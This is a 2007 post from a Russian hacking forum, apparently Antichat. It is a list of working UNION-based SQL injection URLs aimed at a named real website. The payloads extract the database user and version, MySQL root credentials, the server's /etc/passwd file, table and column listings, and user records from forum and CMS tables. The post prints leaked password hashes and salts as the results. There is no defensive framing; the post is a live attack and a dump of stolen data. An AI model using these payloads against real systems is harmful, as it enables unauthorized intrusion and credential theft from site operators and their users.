Показать сообщение отдельно

  #5  
Старый 04.06.2007, 13:11
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7/*
mysql.user:

Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(user,char(58),password),5,6,7+from+mysql.user+limit+1,1/*
root:1da2058b62d7a119

/etc/passwd:

Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7/*
163 таблицы:

Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,table_name,5,6,7+from+information_schema.tables+limit+163,1/*
forum.ibf_members_converge:

Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(converge_id,char(58),converge_pass_hash,char(58),converge_pass_salt),5,6,7+from+forum.ibf_members_converge+limit+0,1/*
1:33581792b4c389b0219866f27c29e3b8:~v-nI:::4334925

lipskerov.phpbb_users:

Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(username,char(58),user_password),5,6,7+from+lipskerov.phpbb_users+limit+1,1/*
alien:5f58ac9c3b1c0c3ce51d3092816b96ed:::4312034

magr.cms_members:

Колонки:

Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,column_name,5,6,7+from+information_schema.columns+where+table_name=char(99,109,115,95,109,101,109,98,101,114,115)+limit+0,1/*
Код:
id
status
name
full_name
phone_1
phone_2
phone_3
phone_4
fax
site
email
director_name
director_dolz
login
pass
in_org
sert
licen
full_info
Вывод инфы:

Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(id,char(58),name),5,6,7+from+magr.cms_members+limit+0,1/*
 
Ответить с цитированием